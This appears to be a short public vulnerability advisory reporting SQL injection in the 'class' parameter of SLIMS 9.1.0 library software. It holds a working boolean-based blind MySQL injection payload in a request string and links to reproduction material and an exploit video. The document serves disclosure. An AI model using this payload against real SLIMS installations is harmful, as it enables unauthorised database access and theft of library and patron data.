## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi
## Author: nu11secur1ty
## Date: 11.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin

## Description:
The manual insertion `point 3` with the `class` parameter appears to
be vulnerable to SQL injection attacks.
A single quote was submitted in the manual insertion `point 3`, and a
general error message was returned.
Two single quotes were then submitted and the error message disappeared.

## STATUS: HIGH Vulnerability

[+] Payload:

```MySQL
---
Parameter: class (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
(CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND
'iuDJ'='iuDJ&membershipType=a''&collType=aaaa
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin)

## Proof and Exploit:
[href](https://streamable.com/qptgmu)

## Time spent
`01:00:00`

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>